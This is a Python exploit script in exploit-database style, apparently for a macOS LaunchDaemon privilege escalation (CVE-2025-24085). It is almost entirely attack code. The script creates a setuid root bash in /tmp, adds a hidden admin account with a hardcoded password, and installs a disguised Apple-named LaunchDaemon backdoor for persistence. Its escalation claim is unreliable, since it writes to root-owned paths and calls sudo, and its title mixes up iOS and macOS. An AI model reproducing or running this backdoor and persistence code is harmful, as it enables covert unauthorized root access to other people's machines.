#!/usr/bin/env python3
# Exploit Title: macOS LaunchDaemon iOS 17.2 - Privilege Escalation
# Author: Mohammed Idrees Banyamer (@banyamer_security)
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# Tested on: macOS Sonoma (14.x ARM64 / x86_64)
# CVE: CVE-2025-24085
# Type: Local Privilege Escalation
# Platform: macOS
# Author Country: Jordan
# Description:
# This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute
# arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary,
# creates an admin user, and installs a persistent LaunchDaemon backdoor for root access. It hijacks the
# com.apple.securemonitor LaunchDaemon plist to trigger the payload, allowing unauthorized escalation to root
# on macOS Sonoma systems.
import os
import plistlib
import time
from pathlib import Path
LAUNCHD_PLIST = "/Library/LaunchDaemons/com.apple.securemonitor.plist"
PAYLOAD_SCRIPT = "/tmp/.macroot_payload.sh"
def create_payload():
print("[+] Creating root payload script...")
payload = """#!/bin/bash
# Root shell
cp /bin/bash /tmp/.rootbash
chmod +s /tmp/.rootbash
chown root:wheel /tmp/.rootbash
# Add admin user
sysadminctl -addUser pentest -password macOS123! -admin
# Log file
echo "[+] Root backdoor triggered at $(date)" >> /tmp/.rootlog
# Persistent backdoor
cat <<EOF > /Library/LaunchDaemons/com.apple.backdoor.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key><string>com.apple.backdoor</string>
<key>ProgramArguments</key><array><string>/tmp/.rootbash</string></array>
<key>RunAtLoad</key><true/>
</dict>
</plist>
EOF
chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist
chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist
"""
with open(PAYLOAD_SCRIPT, "w") as f:
f.write(payload)
os.chmod(PAYLOAD_SCRIPT, 0o755)
def hijack_launchdaemon():
print("[+] Hijacking LaunchDaemon plist...")
if not Path(LAUNCHD_PLIST).exists():
# create a fake one
print("[*] Creating fake LaunchDaemon plist for exploitation...")
plist_data = {
'Label': 'com.apple.securemonitor',
'ProgramArguments': [PAYLOAD_SCRIPT],
'RunAtLoad': True,
}
with open(LAUNCHD_PLIST, "wb") as f:
plistlib.dump(plist_data, f)
else:
# hijack existing one
with open(LAUNCHD_PLIST, 'rb') as f:
plist = plistlib.load(f)
plist['ProgramArguments'] = [PAYLOAD_SCRIPT]
plist['RunAtLoad'] = True
with open(LAUNCHD_PLIST, 'wb') as f:
plistlib.dump(plist, f)
os.system(f"chmod 644 {LAUNCHD_PLIST}")
os.system(f"chown root:wheel {LAUNCHD_PLIST}")
def trigger_payload():
print("[+] Triggering LaunchDaemon manually...")
os.system(f"sudo launchctl load -w {LAUNCHD_PLIST}")
print("[+] Done. You can now execute /tmp/.rootbash -p for root shell")
def main():
if os.geteuid() == 0:
print("[!] You are already root. No need to exploit.")
return
create_payload()
hijack_launchdaemon()
print("[+] Exploit completed. Reboot or run manually:")
print(f" sudo launchctl load -w {LAUNCHD_PLIST}")
print(" Then run: /tmp/.rootbash -p")
if __name__ == "__main__":
main()